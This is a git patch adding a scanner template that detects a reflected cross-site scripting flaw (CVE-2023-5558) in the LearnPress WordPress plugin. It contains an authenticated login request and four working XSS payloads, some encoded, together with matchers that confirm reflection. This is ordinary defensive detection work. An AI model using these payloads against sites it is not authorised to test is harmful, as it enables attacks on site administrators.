From ffa0fbfa166b2b419dd82127fd4880a3fdbab644 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 22 Oct 2024 13:51:48 +0530
Subject: [PATCH] Create CVE-2023-5558.yaml

---
 http/cves/2023/CVE-2023-5558.yaml | 79 +++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-5558.yaml

diff --git a/http/cves/2023/CVE-2023-5558.yaml b/http/cves/2023/CVE-2023-5558.yaml
new file mode 100644
index 0000000000..beaff1f537
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5558.yaml
@@ -0,0 +1,79 @@
+id: CVE-2023-5558
+
+info:
+  name: LearnPress < 4.2.5.5 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+  impact: |
+    Allows attackers to execute malicious scripts in the context of the victim's browser.
+  remediation: |
+    Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5558
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-5558
+    cwe-id: CWE-79
+    epss-score: 0.00046
+    epss-percentile: 0.15636
+    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 6
+    vendor: thimpress
+    product: learnpress
+    framework: wordpress
+  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - "/wp-content/plugins/learnpress"
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /{{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path:
+        - '?param=value%22%27%3Balert(document.domain)%3C!--'
+        - '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
+        - '?%27-alert(%60XSS%60)-%27=a'
+        - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"';alert(document.domain)<!--"
+          - "\"';alert(document.domain);b='"
+          - "'-alert(`XSS`)-'=a"
+          - "</script><script>alert`document.domain`</script>"
+        condition: or
+
+      - type: word
+        part: content_type
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200